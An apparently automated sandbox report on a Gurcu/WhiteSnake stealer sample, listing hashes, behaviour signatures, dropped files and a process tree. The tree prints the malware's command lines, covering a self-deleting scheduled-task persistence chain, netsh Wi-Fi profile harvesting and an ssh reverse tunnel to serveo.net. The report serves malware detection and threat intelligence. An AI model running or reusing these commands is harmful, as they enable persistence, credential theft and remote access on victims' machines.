Analysis

  • max time kernel
    147s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-10-2023 21:51

General

  • Target

    1edb8aa1adacda31bc98064b1634ddea.exe

  • Size

    225KB

  • MD5

    1edb8aa1adacda31bc98064b1634ddea

  • SHA1

    7dc5aee1dd577b61a41a5001d465f0606bb33618

  • SHA256

    fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575

  • SHA512

    26601df19ed259e48ae9e5a792fdb814d216cae446da5f2518670c25df2111a8df69c8afd2059a49e3f2c84156bb4fa95c9106f348535eb79e29f436df42037a

  • SSDEEP

    3072:GQ2NGV19gqU3pJpfYTCOoShKmECPTKBWFPkl6WQre9Q29bSHXGhrD9HA2AF+q73o:uGDCOoSEmkWeILe9z9bS30AzHe0

Malware Config

Signatures

  • Detect Gurcu Stealer V3 payload 4 IoCs
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1edb8aa1adacda31bc98064b1634ddea.exe
    "C:\Users\Admin\AppData\Local\Temp\1edb8aa1adacda31bc98064b1634ddea.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2876
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "1edb8aa1adacda31bc98064b1634ddea" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\1edb8aa1adacda31bc98064b1634ddea.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:672
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:904
        • C:\Windows\system32\PING.EXE
          ping 127.0.0.1
          3⤵
          • Runs ping.exe
          PID:3636
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn "1edb8aa1adacda31bc98064b1634ddea" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe" /rl HIGHEST /f
          3⤵
          • Creates scheduled task(s)
          PID:2584
        • C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe
          "C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2384
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2176
            • C:\Windows\system32\chcp.com
              chcp 65001
              5⤵
                PID:4296
              • C:\Windows\system32\netsh.exe
                netsh wlan show profiles
                5⤵
                  PID:3388
                • C:\Windows\system32\findstr.exe
                  findstr /R /C:"[ ]:[ ]"
                  5⤵
                    PID:3940
                • C:\Windows\SYSTEM32\cmd.exe
                  "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2208
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    5⤵
                      PID:3688
                    • C:\Windows\system32\netsh.exe
                      netsh wlan show networks mode=bssid
                      5⤵
                        PID:2060
                      • C:\Windows\system32\findstr.exe
                        findstr "SSID BSSID Signal"
                        5⤵
                          PID:3380
                      • C:\Windows\System32\OpenSSH\ssh.exe
                        "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6977 serveo.net
                        4⤵
                          PID:2020
                  • C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe
                    C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe
                    1⤵
                    • Executes dropped EXE
                    • Accesses Microsoft Outlook profiles
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    • outlook_office_path
                    • outlook_win_path
                    PID:4468
                    • C:\Windows\system32\cmd.exe
                      "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4788
                      • C:\Windows\system32\chcp.com
                        chcp 65001
                        3⤵
                          PID:384
                        • C:\Windows\system32\netsh.exe
                          netsh wlan show profiles
                          3⤵
                            PID:2888
                          • C:\Windows\system32\findstr.exe
                            findstr /R /C:"[ ]:[ ]"
                            3⤵
                              PID:3252
                          • C:\Windows\system32\cmd.exe
                            "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1976
                            • C:\Windows\system32\chcp.com
                              chcp 65001
                              3⤵
                                PID:408
                              • C:\Windows\system32\findstr.exe
                                findstr "SSID BSSID Signal"
                                3⤵
                                  PID:2464
                                • C:\Windows\system32\netsh.exe
                                  netsh wlan show networks mode=bssid
                                  3⤵
                                    PID:3156
                                • C:\Windows\System32\OpenSSH\ssh.exe
                                  "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6977 serveo.net
                                  2⤵
                                    PID:1352

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\.ssh\known_hosts

                                  Filesize

                                  406B

                                  MD5

                                  ec266d309cbad86b3e4939f2117dfe39

                                  SHA1

                                  cf12599fbdc167b4c01b518a0bd63d51cd83798b

                                  SHA256

                                  2f8ecca5380615bcd1530817933a7ea03d2d4fdc7d6e634829aa54e40413b05d

                                  SHA512

                                  d2d39d9174f459146de57c205979e7815829c37eafd214cdce88f90a961f04e5468290e530cf31b9b621276a86eb3a071bbf3464962e1a8e44a7478794571baa

                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\1edb8aa1adacda31bc98064b1634ddea.exe.log

                                  Filesize

                                  847B

                                  MD5

                                  3308a84a40841fab7dfec198b3c31af7

                                  SHA1

                                  4e7ab6336c0538be5dd7da529c0265b3b6523083

                                  SHA256

                                  169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e

                                  SHA512

                                  97521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198

                                • C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe

                                  Filesize

                                  225KB

                                  MD5

                                  1edb8aa1adacda31bc98064b1634ddea

                                  SHA1

                                  7dc5aee1dd577b61a41a5001d465f0606bb33618

                                  SHA256

                                  fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575

                                  SHA512

                                  26601df19ed259e48ae9e5a792fdb814d216cae446da5f2518670c25df2111a8df69c8afd2059a49e3f2c84156bb4fa95c9106f348535eb79e29f436df42037a

                                • C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe

                                  Filesize

                                  225KB

                                  MD5

                                  1edb8aa1adacda31bc98064b1634ddea

                                  SHA1

                                  7dc5aee1dd577b61a41a5001d465f0606bb33618

                                  SHA256

                                  fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575

                                  SHA512

                                  26601df19ed259e48ae9e5a792fdb814d216cae446da5f2518670c25df2111a8df69c8afd2059a49e3f2c84156bb4fa95c9106f348535eb79e29f436df42037a

                                • C:\Users\Admin\AppData\Local\WindowsSecurity\1edb8aa1adacda31bc98064b1634ddea.exe

                                  Filesize

                                  225KB

                                  MD5

                                  1edb8aa1adacda31bc98064b1634ddea

                                  SHA1

                                  7dc5aee1dd577b61a41a5001d465f0606bb33618

                                  SHA256

                                  fb33ecb0d51761b0bde6977c7ae7eec18fd4c326bd73f3f4fac32e9abfb18575

                                  SHA512

                                  26601df19ed259e48ae9e5a792fdb814d216cae446da5f2518670c25df2111a8df69c8afd2059a49e3f2c84156bb4fa95c9106f348535eb79e29f436df42037a

                                • C:\Users\Admin\AppData\Local\loshoa0u2z\port.dat

                                  Filesize

                                  4B

                                  MD5

                                  312f1ba2a72318edaaa995a67835fad5

                                  SHA1

                                  8761e8e1ab69dd4c5916970977eae3b5877396e2

                                  SHA256

                                  ab2a4711117d0c7bb2a82d84ccfcdd6b172746f5859a14ebb111c4636cdf1fd2

                                  SHA512

                                  57557536fd5ad3c0d17347814786a7cc0d6530a2e7eba7559e9b6ad784721188b9a88419f5fdd10b21377883c40a82a558331624dd21734816b50062838ffbf9

                                • memory/2384-12-0x00000274D28B0000-0x00000274D28C0000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/2384-11-0x00007FFA261A0000-0x00007FFA26C61000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/2384-15-0x00007FFA261A0000-0x00007FFA26C61000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/2384-16-0x00000274D28B0000-0x00000274D28C0000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/2876-0-0x000002B111240000-0x000002B11127E000-memory.dmp

                                  Filesize

                                  248KB

                                • memory/2876-6-0x00007FFA263E0000-0x00007FFA26EA1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/2876-2-0x000002B111680000-0x000002B111690000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/2876-1-0x00007FFA263E0000-0x00007FFA26EA1000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4468-18-0x00007FFA261A0000-0x00007FFA26C61000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4468-19-0x00000147BA970000-0x00000147BA980000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/4468-22-0x00007FFA261A0000-0x00007FFA26C61000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4468-23-0x00000147BA970000-0x00000147BA980000-memory.dmp

                                  Filesize

                                  64KB